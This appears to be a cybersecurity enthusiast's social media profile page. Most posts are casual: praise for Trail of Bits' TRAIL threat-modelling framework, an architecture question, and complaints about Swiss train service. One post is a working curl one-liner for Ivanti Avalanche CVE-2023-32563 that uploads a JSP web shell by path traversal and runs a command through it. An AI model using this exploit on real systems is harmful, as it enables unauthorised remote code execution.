@starbuck3000

31 Followers
40 Following
70 Posts
Have you read the terms and conditions?
#cyber #cybersecurity #privacy
Twitter: https://www.twitter.com/starbuck3000

So @trailofbits released a new threat modelling framework. I really like that, as all of the old existing 'reference' frameworks are so hard to apply in a way that brings any or much value to the process. Or I'm too dumb to do it :P.

Very exciting: https://blog.trailofbits.com/2025/02/28/threat-modeling-the-trail-of-bits-way/

#threatmodelling

Threat modeling the TRAIL of Bits way

In this blog, we’ll talk about our threat modeling process, TRAIL, which stands for Threat and Risk Analysis Informed Lifecycle. TRAIL enables us to trace and document the impact of flawed trust assumptions and insecure design decisions throughout each client’s system architecture and SDLC. Over time, multiple application security experts have refined TRAIL to provide maximal value for our clients and to minimize the effort required to update the threat model as the system changes.

The Trail of Bits Blog
@plexus : interesting comparison. If I may: would you modify your analogy if we separate the addition of "stages" inside the code (e.g., adding a feature that brings great additional complexity into an existing monolithic artefact) vs. adding "stages" outside the code itself, which greatly complexifies the system's architecture/infrastructure cost of operation (e.g., moving to a K8S/Kafka infra.)?

@limp15000 : Oh yes, I can second this. Things were running somehow smoothly for a few months until three or four weeks ago. Since then, CFF has had issues almost (if not always) every time I have taken the train from/to Geneva. Delays, breakdowns, two "accidents", misinformation, carriage breakdowns, broken seats, broken ACs, broken doors, broken toilets, broken ticket shop, etc.

The thing I am still actually thankful for is that, for the moment, CFF always brings me from A to B. That's a big win.


Ivanti Avalanche CVE-2023-32563:

curl -v http://192.168.56.101:1900/Servlet/Skins -F guid=../../../Web/webapps/ROOT -F "file=@-;filename=x.jsp" <<<'<%Runtime.getRuntime().exec(request.getParameter("c"));%>' -: -k https://192.168.56.101:8443/x.jsp -d c=mspaint.exe

@GossiTheDog : good case of the old "with the cloud, no need to deal with backups anymore".
@GossiTheDog : got it, thank you!
@GossiTheDog : I noticed that PowerShell tends to return up to 1'000 events, but I hadn't heard about this limitation. Do you have more information about this? If this is true, the "audit log" should never be called as such.
@sarambsimon : I came here through HN, and I had never heard of that article. thank you for sharing!
@kurtsh : that roughly translates to USD33m... wow!
Good thing your work prevented you from making this huge "mistake" :)